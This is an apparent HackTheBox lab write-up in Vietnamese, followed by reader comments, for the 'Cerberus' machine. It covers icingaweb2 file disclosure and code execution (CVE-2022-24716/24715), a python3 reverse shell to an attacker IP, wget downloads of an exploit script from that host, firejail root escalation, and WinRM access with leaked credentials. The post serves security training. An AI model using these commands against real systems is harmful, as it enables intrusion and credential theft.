Cerberus là một máy windows trong Open Beta Season của HackTheBox, Trong máy tồn tại lỗi hổng LFI(CVE-2022-24716), và RCE(CVE-2022-24715) trên icinga web 2. Tồn tại docker box trong windows box. Là một máy khá rắc rối và nhiều bước.
Enumeration
Zenmap:
Kiểm tra port 8080 với domain. Tôi thấy đây là một website icingaweb2. Tìm kiếm thông tin về icingaweb2 trên google, tôi tìm thấy 2 vulnerabilities:
+ Arbitrary File Disclosure (CVE-2022-24716)
curl https://icinga.com/<demo>/lib/icinga/icinga-php-thirdparty/etc/hosts -v
+ Remote Code Execution (CVE-2022-24715)
Tìm kiếm config icingaweb2 trên google, tôi tìm được:
http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
Tôi đã nhận được user và pass của mysql, thử dùng nó để đăng nhập vào icingaweb2 và thành công login.
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWeb************"
use_ssl = "0"
Đổi Module Path: /dev/
Tạo user yu8
Open http://icinga.cerberus.local:8080/icingaweb2/shm/run.php
PS D:\thehackbox\Machines\Cerberus> curl.exe -X POST http://icinga.cerberus.local:8080/icingaweb2/shm/run.php?cmd=python3%20-V --output -
file:///etc/icingaweb2/ssh/yu8Python 3.10.6
<!DOCTYPE html>
<html class="no-js" lang="en">
...
Trên server có tồn tại python3, tạo reverse shell python3
export RHOST="<IP>";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
PS D:\thehackbox\tool\chisel\win> curl.exe -X POST http://icinga.cerberus.local:8080/icingaweb2/shm/run.php?cmd=export%20RHOST%3D%2210.10.16.7%22%3Bexport%20RPORT%3D4444%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22bash%22%29%27
PS C:\Users\84911> ncat.exe -l 4444
www-data@icinga:/usr/share/icingaweb2/public$ whoami
www-data
www-data@icinga:/usr/share/icingaweb2/public$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/ccreds_chkpwd
/usr/bin/mount
/usr/bin/sudo
/usr/bin/firejail
/usr/bin/chfn
/usr/bin/fusermount3
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/ksu
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
www-data@icinga:/usr/share/icingaweb2/public$
Tại sao lại là Linux, Cerberus của HackTheBox không phải là máy windows sao? Tôi đoán nó là box docker bên trong box windows
Tiếp tục tìm kiếm google tôi thấy firejail có thể khai thác để lên quyền:
file firejoin.py
Đổi tên và upload file firejoin.py lên box.
PS D:\thehackbox\Machines\Cerberus> python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.137.84 - - [21/Mar/2023 16:31:35] "GET /firejoin.py HTTP/1.1" 200 -
-------------------------------------------
www-data@icinga:/tmp$ wget http://10.10.16.7/firejoin.py
wget http://10.10.16.7/firejoin.py
--2023-03-21 09:31:31-- http://10.10.16.7/firejoin.py
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8651 (8.4K) [text/x-python]
Saving to: ΓÇÿfirejoin.pyΓÇÖ
firejoin.py 100%[===================>] 8.45K 34.1KB/s in 0.2s
2023-03-21 09:31:32 (34.1 KB/s) - ΓÇÿfirejoin.pyΓÇÖ saved [8651/8651]
www-data@icinga:/tmp$ chmod 777 firejoin.py
chmod 777 firejoin.py
www-data@icinga:/tmp$ python3 firejoin.py
python3 firejoin.py
You can now run 'firejail --join=3016' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
#################### open new shell #####################
www-data@icinga:/tmp$ firejail --join=3016
firejail --join=3016
changing root to /proc/3016/root
Warning: cleaning all supplementary groups
Child process initialized in 26.79 ms
www-data@icinga:/tmp$ su -
su -
root@icinga:~# whoami
whoami
root
Kiểm tra /var/lib/sss/db và extract các file ldb tôi thu được
Kiểm tra ip máy:
Có kết nối tới máy 172.16.22.1, tôi đoán đây có thể là máy windows. tải tệp static nmap lên máy và scan.
root@icinga:/tmp# wget http://10.10.16.7/nmap
wget http://10.10.16.7/nmap
--2023-03-21 09:43:33-- http://10.10.16.7/nmap
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5944464 (5.7M) [application/octet-stream]
Saving to: 'nmap'
nmap 100%[===================>] 5.67M 822KB/s in 12s
2023-03-21 09:43:46 (475 KB/s) - 'nmap' saved [5944464/5944464]
root@icinga:/tmp# chmod 777 nmap
chmod 777 nmap
root@icinga:/tmp# ./nmap -p- 172.16.22.1
./nmap -p- 172.16.22.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-03-21 09:44 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC.cerberus.local (172.16.22.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00042s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
5985/tcp open unknown
MAC Address: 00:15:5D:5F:E8:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds
Tôi scan được port 5985, đây là port cho winrm. Tải chisel lên box và thực hiện port forward.
root@icinga:/tmp# wget http://10.10.16.7/nmap
wget http://10.10.16.7/nmap
--2023-03-21 09:43:33-- http://10.10.16.7/nmap
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5944464 (5.7M) [application/octet-stream]
Saving to: 'nmap'
nmap 100%[===================>] 5.67M 822KB/s in 12s
2023-03-21 09:43:46 (475 KB/s) - 'nmap' saved [5944464/5944464]
root@icinga:/tmp# chmod 777 nmap
chmod 777 nmap
root@icinga:/tmp# ./nmap -p- 172.16.22.1
./nmap -p- 172.16.22.1
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-03-21 09:44 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for DC.cerberus.local (172.16.22.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00042s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
5985/tcp open unknown
MAC Address: 00:15:5D:5F:E8:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 20.32 seconds
Có hai cách kết nối tới máy Win.
Cách 1: sử dụng evil-winrm trên linux:
┌──(yu8㉿Hu***)-[~]
└─$ evil-winrm -i 10.10.16.7 -u matthew -p *********
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\matthew\Desktop> ls
Directory: C:\Users\matthew\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/20/2023 10:39 PM 34 user.txt
*Evil-WinRM* PS C:\Users\matthew\Desktop>
Cách 2: sử dụng Enter-PSSession trên window:
PS D:\thehackbox\Machines\Cerberus> $password=ConvertTo-SecureString '*********' -Asplaintext -force
PS D:\thehackbox\Machines\Cerberus> $creds=New-Object System.Management.Automation.PSCredential("cerberus.local\matthew", $password)
PS D:\thehackbox\Machines\Cerberus> Enter-PSSession -ComputerName 127.0.0.1 -Port 5985 -Credential $creds
[127.0.0.1]: PS C:\Users\matthew\Documents> cd ../Desktop
[127.0.0.1]: PS C:\Users\matthew\Desktop> ls
Directory: C:\Users\matthew\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/20/2023 10:39 PM 34 user.txt
Tham khảo thêm: Pentesting WinRM
please do more for root machine
I've been having a bit of trouble lately and I haven't had the motivation to continue writing. Stay tuned, I'll let you know when I write more
Hello, is there a way I can dm you privately?
Since I have my job and don't want to have any privately connections, if you have any problem, please talk to me via blog.
Ok, so I want to know about getting the root
https://yu8pentest.blogspot.com/2023/03/cerberus-pric.html
any hint for the PrivEsc for root on the windows machine? winpeas so far get me back nothing useful and the only thing that i can see that could be exploit is the ADSelfService Plus but no luck so far
https://yu8pentest.blogspot.com/2023/03/cerberus-pric.html
This comment has been removed by the author.